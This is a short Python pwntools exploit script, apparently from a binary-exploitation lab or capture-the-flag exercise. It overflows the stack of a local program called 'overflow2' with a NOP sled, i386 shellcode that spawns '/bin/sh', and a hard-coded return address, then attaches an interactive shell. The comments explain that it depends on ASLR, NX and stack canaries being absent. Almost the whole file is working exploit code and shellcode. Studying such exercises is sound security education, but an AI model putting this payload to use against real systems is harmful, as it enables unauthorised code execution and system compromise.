#!/usr/bin/python

from pwn import *

def main():
    """Launch the local ./overflow2 binary and send it a stack-overflow payload.

    The payload is 62 bytes of NOP sled plus 32-bit x86 shellcode, followed
    by a 4-byte packed return address. After sending it, the script attaches
    the terminal to the child process.

    The technique relies on three properties of the target that this script
    does not check:

    * a fixed stack address (ASLR disabled, and the same environment and
      arguments as when ``ret_address`` was measured),
    * an executable stack (no NX/DEP),
    * no stack canary in front of the saved return address.

    A build with any of those mitigations enabled should crash or abort
    rather than run the payload.
    """
    # Spawn the target as a child process; `p` is the pwntools tube used to
    # talk to its stdin/stdout.
    p = process("./overflow2")

    # Hard-coded 32-bit stack address written over the saved return address.
    # Presumably it points into the NOP sled inside the target's buffer;
    # confirm in a debugger. The value shifts with environment size and is
    # randomized when ASLR is on.
    ret_address = 0xffffd6a0
    # Disabled alternative payload kept for reference; its trailing bytes are
    # the ASCII text "Hello World".
    #shellcode = b"\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xeb\x11\xb0\x04\xb3\x01\xb2\x0b\x59\xcd\x80\x31\xc0\xb0\x01\x30\xdb\xcd\x80\xe8\xea\xff\xff\xff\x48\x65\x6c\x6c\x6f\x20\x57\x6f\x72\x6c\x64"
    # Active payload: i386 Linux machine code ending in the literal path
    # "/bin/sh". It issues `int 0x80` with al = 0x0b, the execve syscall
    # number on i386.
    shellcode = (b"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" +
                 b"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" +
                 b"\x80\xe8\xdc\xff\xff\xff/bin/sh")
    # Layout: [NOP sled][shellcode][return address]. b"\x90" is the x86 NOP.
    # 62 is presumably the distance from the start of the buffer to the saved
    # return address. TODO: confirm against overflow2.
    # NOTE(review): if the shellcode ever exceeds 62 bytes the multiplier goes
    # negative, the sled silently becomes empty and the address no longer
    # lands at offset 62.
    # p32() packs the address as 4 bytes, little-endian under the pwntools
    # default context.
    payload =  b"\x90" * (62 - len(shellcode)) + shellcode + p32(ret_address)

    # send() writes the bytes as-is, with no trailing newline appended.
    p.send(payload)

    # Hand the terminal over to the child process's stdin/stdout.
    p.interactive()

# Run main() only when this file is executed as a script, not when it is
# imported as a module.
if __name__ == "__main__":
    main()

